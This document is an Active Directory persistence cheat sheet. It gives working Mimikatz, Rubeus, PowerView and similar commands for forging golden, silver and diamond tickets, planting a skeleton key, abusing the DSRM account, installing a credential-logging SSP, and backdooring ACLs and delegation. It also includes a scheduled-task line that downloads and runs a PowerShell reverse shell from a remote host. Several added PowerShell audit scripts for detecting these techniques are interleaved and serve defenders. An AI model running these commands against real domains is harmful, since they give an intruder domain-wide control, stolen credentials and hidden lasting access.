AD DS Persistence
Reference talks: Insomnihack 2024, or in French, LeHack 2023.
Golden Tickets
The krbtgt hash can be used to impersonate any user.
It is recommended to change the password of the krbtgt account twice, as password history is maintained for the account.
Mimikatz on the DC to get the krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
DCSync (no code execution on the target DC) to get the krbtgt hash
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
The krbtgt hash can also be dumped from NTDS.dit
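As an added defender-side check, not part of these notes, the following PowerShell reports the password age of every krbtgt account (the domain krbtgt plus any RODC krbtgt_<id> accounts) and flags those past a rotation threshold. It assumes the RSAT ActiveDirectory module and read access to the domain; the 180-day threshold is an assumed value, not a Microsoft default.

```powershell
# Added example: audit krbtgt password age (assumes the RSAT ActiveDirectory module).
Import-Module ActiveDirectory

function Get-KrbtgtPasswordAge {
    param(
        # Rotation threshold in days; 180 is an assumed value, set it to your own policy.
        [int]$MaxAgeDays = 180
    )
    # The writable-DC krbtgt plus any RODC-specific krbtgt_<id> accounts.
    $accounts = Get-ADUser -Filter 'SamAccountName -like "krbtgt*"' -Properties PasswordLastSet
    foreach ($acct in $accounts) {
        $ageDays = [int]((Get-Date) - $acct.PasswordLastSet).TotalDays
        [pscustomobject]@{
            Account         = $acct.SamAccountName
            PasswordLastSet = $acct.PasswordLastSet
            AgeDays         = $ageDays
            NeedsRotation   = ($ageDays -gt $MaxAgeDays)
        }
    }
}

# Show the accounts that should be rotated. Rotate twice, leaving enough time between
# the two resets for replication to complete and for outstanding TGTs to expire.
Get-KrbtgtPasswordAge | Where-Object NeedsRotation | Format-Table -AutoSize
```

A golden ticket forged with an old krbtgt key keeps working until both resets have replicated, which is why the age of the key, not just the existence of a rotation procedure, is the value worth monitoring.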
Create golden ticket
Using AES keys makes the attack more silent
From any machine connected to the DC:
Mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
BetterSafetyKatz
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Rubeus
Rubeus.exe golden /aes256:<krbtgt_aes256_key> /sid:<domain_sid> /ldap /user:Administrator /printcmd
Silver Tickets
Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS), encrypted and signed with the hash of the service account (a golden ticket is signed with the hash of krbtgt)
Ex 1 : Access to file system on the DC
Using an AES key is more silent
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Can be used for other services: HOST, RPCSS, HTTP, etc.
List of SPN: https://adsecurity.org/?page_id=183
Ex: HTTP With Rubeus
Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /ptt
Ex 2 : Achieve command execution using silver ticket
The HOST SPN allows us to schedule a task on the target
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Schedule and execute a task
schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""
schtasks /Run /S dc.domain.local /TN "STCheck"
Diamond Tickets
Decrypt a valid TGT, make changes to it and re-encrypt it using krbtgt account
More opsec safe than a golden ticket
Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
The /tgtdeleg option can be used in place of credentials when we have access to a domain user
Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Skeleton Key
Patch a DC (lsass process) so that it allows access as any user with a single password
Skeleton Key is not opsec safe and is known to cause issues with AD CS
Inject a skeleton key (the password is "mimikatz") on a DC.
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local
Now, we can access any machine with a valid username and the password "mimikatz"
Enter-PSSession -ComputerName dc -Credential domain\Administrator
In case lsass is running as a protected process, we need mimidrv.sys on disk on the target DC
Very noisy in logs: service installation (kernel mode driver)
mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-
Modify the default key
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611
For example, to use "S3c3rtP@ss", compute its RC4 (NT) hash and split it into four 4-byte chunks (8 hex characters each):
56aa742a
6bebb9ca
62fc9f70
a2e00cd3
Reverse the byte order of each chunk (little-endian DWORDs):
2a74aa56
cab9eb6b
709ffc62
d30ce0a2
Prepend 0x to each and modify the kiwiKey array value in the code linked above:
DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2};
DSRM - Directory Services Restore Mode
There is a local "Administrator" account on every DC whose password is the DSRM password. The DSRM password is set when a server is promoted to a DC and it is rarely changed
Dump the DSRM password - DA privileges needed
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dc
Compare the Administrator hash with the Administrator hash from the command below
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dc
The logon behavior for the DSRM account needs to be changed before passing the hash
Enter-PSSession -ComputerName dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
or
Invoke-Command -ComputerName dc -ScriptBlock {
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
}
Pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'
ls \\dc\C$
To use PSRemoting, we must force NTLM authentication:
Enter-PSSession -ComputerName dc -Authentication Negotiate
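The registry change above is the detectable footprint of this technique: DsrmAdminLogonBehavior is absent (default 0) on a healthy DC. The following PowerShell, added here as an example and not part of these notes, reads the value on every DC in the domain and flags non-default settings. It assumes the RSAT ActiveDirectory module and PowerShell remoting to the DCs.

```powershell
# Added example: audit DsrmAdminLogonBehavior on every DC (assumes the RSAT
# ActiveDirectory module and WinRM access to the domain controllers).
Import-Module ActiveDirectory

function Get-DsrmLogonBehavior {
    param(
        [string[]]$DomainController = (Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName)
    )
    Invoke-Command -ComputerName $DomainController -ScriptBlock {
        $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
        $item = Get-ItemProperty -Path $key -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue
        # Absent value = default 0: the DSRM admin can only log on in Directory Services Restore Mode.
        # 1 = usable while the AD DS service is stopped; 2 = usable at any time (what the PtH step needs).
        $value = 0
        if ($null -ne $item) { $value = [int]$item.DsrmAdminLogonBehavior }
        [pscustomobject]@{
            DomainController       = $env:COMPUTERNAME
            DsrmAdminLogonBehavior = $value
            NonDefault             = ($value -ne 0)
        }
    } | Select-Object DomainController, DsrmAdminLogonBehavior, NonDefault
}

Get-DsrmLogonBehavior | Format-Table -AutoSize
```

Any DC reporting NonDefault deserves a look at who created or modified that value; pairing this with monitoring of the registry key (for example via Sysmon registry events or object access auditing on the Lsa key) turns a one-off audit into ongoing detection.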
Custom SSP
A Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Examples: NTLM, Kerberos, WDigest, CredSSP
Mimikatz's mimilib.dll is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server
All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log
Way 1
Drop mimilib.dll into system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
Way 2
Inject into lsass
Not stable with Server 2019 and Server 2022
Invoke-Mimikatz -Command '"misc::memssp"'
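Both ways leave something to find: Way 1 adds a name to the Security Packages values and a DLL in system32, and both write their log file there. The following PowerShell, an added example rather than part of these notes, enumerates the registered packages under both registry keys, flags anything outside an assumed baseline of Windows-shipped SSPs, and checks for the mimilib artifacts. It is meant to be run elevated on the host being audited; the baseline list is an assumption to extend with packages legitimately deployed in your environment.

```powershell
# Added example: look for unexpected Security Support Providers and mimilib artifacts.
# Run locally on each DC (elevated). The known-package list is an assumed baseline.
function Get-SecurityPackageAudit {
    param(
        [string[]]$KnownPackage = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
    )
    $keys = @(
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
    )
    foreach ($key in $keys) {
        $packages = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($pkg in @($packages)) {
            $name = "$pkg".Trim().Trim('"')
            if ($name -eq '') { continue }   # recent builds ship an empty entry here
            [pscustomobject]@{
                Source     = $key
                Item       = $name
                Unexpected = ($KnownPackage -notcontains $name.ToLower())
            }
        }
    }
    # Files the custom SSP needs or writes; any hit is a strong signal on its own.
    foreach ($file in 'mimilib.dll', 'mimilsa.log', 'kiwissp.log') {
        $path = Join-Path $env:SystemRoot "System32\$file"
        if (Test-Path $path) {
            [pscustomobject]@{ Source = 'FileSystem'; Item = $path; Unexpected = $true }
        }
    }
}

Get-SecurityPackageAudit | Where-Object Unexpected | Format-Table -AutoSize
```

Way 2 (memssp) patches lsass in memory and adds no registry entry, so for that variant only the log file check and memory inspection of lsass apply; a clean registry result does not rule it out.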
AdminSDHolder
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL
Well-known abuses of Protected Groups (see the OSSIR slides):
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
Protected Group abuse: can modify DA/EA/BA groups, and nested groups within these groups
Backup a GPO, edit it to add the SID of a controlled account to a privileged group, and restore it
Run a command as SYSTEM (using the disabled Browser service)
Copy an ntds.dit backup, load device drivers
Group privileges: add full permissions to a user
With DA privs, AdminSDHolder can be used as a backdoor/persistence mechanism by adding a user with Full Permissions to the AdminSDHolder object
With PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
With AD Module and RACE toolkit
Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose
Other permissions: ResetPassword, WriteMembers
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Run SDProp manually
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
For pre-Server 2008:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
Check Domain Admins permissions
PowerView
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_} | ?{$_.IdentityName -match "username"}
AD Module
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'}
Exploit
FullControl
PowerView
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members testda
ResetPassword
PowerView
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
AD Module
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
Rights Abuse
With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync
FullControl
Add FullControl rights:
With PowerView
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
With AD Module and RACE toolkit (https://github.com/samratashok/RACE)
Set-ADACL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -Verbose
DCSync
Add rights for DCSync:
With PowerView
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
With AD Module and RACE toolkit (https://github.com/samratashok/RACE)
Set-ADACL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -Verbose
Execute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
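The AdminSDHolder and domain-root backdoors above both come down to one extra ACE on a single object, so one audit covers both. The following PowerShell, added here as an example and not part of these notes, lists the ACEs on AdminSDHolder and on the domain root that grant full control, WriteDacl/WriteOwner, the DCSync replication rights, ResetPassword or write access to the member attribute, and marks whether the trustee is one you would expect. It assumes the RSAT ActiveDirectory module (which provides the AD: drive); the list of expected trustees is an assumed baseline to adjust per domain.

```powershell
# Added example: audit sensitive ACEs on AdminSDHolder and the domain root.
# Assumes the RSAT ActiveDirectory module; $ExpectedTrustee is an assumed baseline.
Import-Module ActiveDirectory

# Well-known schema GUIDs for the rights a persistence ACE would use.
$RightGuid = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password (ResetPassword)'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member attribute (WriteMembers)'
}
# Principals normally holding such rights (assumed baseline; tune it for your domain).
$ExpectedTrustee = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|.+\\(Domain|Enterprise) Admins|.+\\(Enterprise )?(Read-only )?Domain Controllers)$'

function Get-SensitiveAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    $acl = Get-Acl -Path ("AD:\" + $DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights
        $guid   = $ace.ObjectType.ToString()
        $why    = @()
        if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll))  { $why += 'GenericAll' }
        if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl))   { $why += 'WriteDacl' }
        if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteOwner))  { $why += 'WriteOwner' }
        # Object-specific rights only matter with ExtendedRight (replication, reset) or WriteProperty (member).
        $objectRight = $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -or
                       $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteProperty)
        if ($objectRight -and $RightGuid.ContainsKey($guid)) { $why += $RightGuid[$guid] }
        if ($why.Count -eq 0) { continue }
        [pscustomobject]@{
            Object    = $DistinguishedName
            Trustee   = $ace.IdentityReference.Value
            Rights    = ($why -join ', ')
            Inherited = $ace.IsInherited
            Expected  = [bool]($ace.IdentityReference.Value -match $ExpectedTrustee)
        }
    }
}

$domain = Get-ADDomain
Get-SensitiveAce -DistinguishedName "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
Get-SensitiveAce -DistinguishedName $domain.DistinguishedName |
    Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

Because SDProp copies the AdminSDHolder ACL onto every protected object within the hour, an unexpected trustee on AdminSDHolder will also show up on Domain Admins and the other protected groups; fixing only the group ACL without fixing AdminSDHolder gets undone at the next propagation.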
Security Descriptors
Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required
With RACE toolkit: https://github.com/samratashok/RACE
WMI
On the local machine for user1
Set-RemoteWMI -SamAccountName user1 -Verbose
On a remote machine for user1 without explicit credentials
Set-RemoteWMI -SamAccountName user1 -ComputerName dc -namespace 'root\cimv2' -Verbose
On a remote machine with explicit credentials
Set-RemoteWMI -SamAccountName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -Verbose
On a remote machine, remove permissions
Set-RemoteWMI -SamAccountName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose
PS Remoting backdoor
Not stable after August 2020 patches
On the local machine for user1
Set-RemotePSRemoting -SamAccountName user1 -Verbose
On a remote machine for user1 without explicit credentials
Set-RemotePSRemoting -SamAccountName user1 -ComputerName dc -Verbose
On a remote machine, remove permissions
Set-RemotePSRemoting -SamAccountName user1 -ComputerName dc -Remove
Remote Registry
With DAMP
Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose
As user1, retrieve the machine account hash
Get-RemoteMachineAccountHash -ComputerName dc -Verbose
Retrieve the local account hash
Get-RemoteLocalAccountHash -ComputerName dc -Verbose
Retrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName dc -Verbose
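Each of the three backdoors in this section works by adding a trustee to a security descriptor that is rarely reviewed, so the audit is simply to dump those descriptors and compare them with a clean host. The following PowerShell is an added example, not part of these notes or of the RACE/DAMP projects: run elevated on the host being audited, it lists who is granted access through the PowerShell remoting session configurations, the DACL of the WMI root\cimv2 namespace, and the winreg key that gates remote registry access.

```powershell
# Added example: list trustees on the three remote-access paths a non-admin backdoor
# would modify. Run elevated on the host being audited; compare against a clean host.
function Get-RemoteAccessTrustee {
    # 1. PowerShell remoting: Permission summarises the session configuration SDDL.
    foreach ($cfg in Get-PSSessionConfiguration) {
        [pscustomobject]@{ Path = "PSRemoting:$($cfg.Name)"; Trustee = $cfg.Permission }
    }
    # 2. WMI namespace DACL, read through the static __SystemSecurity.GetSecurityDescriptor method.
    $sd = (Invoke-CimMethod -Namespace 'root\cimv2' -ClassName __SystemSecurity -MethodName GetSecurityDescriptor).Descriptor
    foreach ($ace in $sd.DACL) {
        [pscustomobject]@{
            Path    = 'WMI:root\cimv2'
            Trustee = "$($ace.Trustee.Domain)\$($ace.Trustee.Name) (mask 0x$('{0:X}' -f $ace.AccessMask))"
        }
    }
    # 3. Remote registry: the winreg key DACL decides who may open the remote registry service at all.
    $winreg = Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
    foreach ($ace in $winreg.Access) {
        [pscustomobject]@{
            Path    = 'Registry:winreg'
            Trustee = "$($ace.IdentityReference) ($($ace.RegistryRights))"
        }
    }
}

Get-RemoteAccessTrustee | Format-Table -AutoSize -Wrap
```

On a default installation the trustees are limited to Administrators, SYSTEM and the built-in remote management groups; a plain domain user appearing on any of these paths is the finding. The hash-retrieval helpers above additionally need read access to the SAM and SECURITY hives, so their key ACLs are worth the same comparison.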
msDS-AllowedToDelegateTo
Requires SeEnableDelegationPrivilege on the DC and full rights on the target user (default for Domain Admins and Enterprise Admins)
With PowerShell
# PowerView
Set-DomainObject -Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject -Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
Set-DomainObject -Identity devuser -Xor @{"useraccountcontrol"="16777216"}
Get-DomainUser -TrustedToAuth
# AD Module
Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser -Add @{'msDS-AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local')} -Verbose
Set-ADAccountControl -Identity devuser -TrustedToAuthForDelegation $true
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
With Kekeo
kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!
kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
With Rubeus
# Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local
Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
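The combination these commands create, an account allowed to delegate to a service on a DC with protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION, 0x1000000) enabled, is a small and queryable set. The following PowerShell, an added example rather than part of these notes, enumerates every object with msDS-AllowedToDelegateTo, decodes the userAccountControl flag, and marks accounts whose targets include a domain controller. It assumes the RSAT ActiveDirectory module; it compares target hosts against both the FQDN and the short name of each DC, since either form (as in the ldap/dc and ldap/dc.domain.local entries above) can appear.

```powershell
# Added example: audit constrained delegation with protocol transition towards DCs.
# Assumes the RSAT ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

function Get-ConstrainedDelegationAudit {
    # DC names in both FQDN and short form, lower-cased for comparison.
    $dcHosts = Get-ADDomainController -Filter * |
        ForEach-Object { $_.HostName; $_.Name } |
        ForEach-Object { $_.ToLower() }
    $objects = Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties sAMAccountName, userAccountControl, 'msDS-AllowedToDelegateTo'
    foreach ($obj in $objects) {
        $uac     = [int]$obj.userAccountControl
        $targets = @($obj.'msDS-AllowedToDelegateTo')
        # Target SPNs look like service/host[:port]; compare the host part with the DC names.
        $dcTargets = @($targets | Where-Object {
            $hostPart = (($_ -split '/')[1] -replace ':.*$', '')
            $dcHosts -contains "$hostPart".ToLower()
        })
        $protocolTransition = [bool]($uac -band 0x1000000)   # TRUSTED_TO_AUTH_FOR_DELEGATION
        [pscustomobject]@{
            Account            = $obj.sAMAccountName
            ProtocolTransition = $protocolTransition
            Targets            = ($targets -join ', ')
            TargetsDC          = ($dcTargets.Count -gt 0)
            HighRisk           = ($protocolTransition -and $dcTargets.Count -gt 0)
        }
    }
}

Get-ConstrainedDelegationAudit | Sort-Object HighRisk -Descending | Format-Table -AutoSize
```

Protocol transition lets the account obtain a service ticket for any user without that user ever authenticating, so a HighRisk row is effectively a standing path to the DC service listed; delegation to a DC should be justified explicitly, and the rest removed or switched to Kerberos-only (no protocol transition).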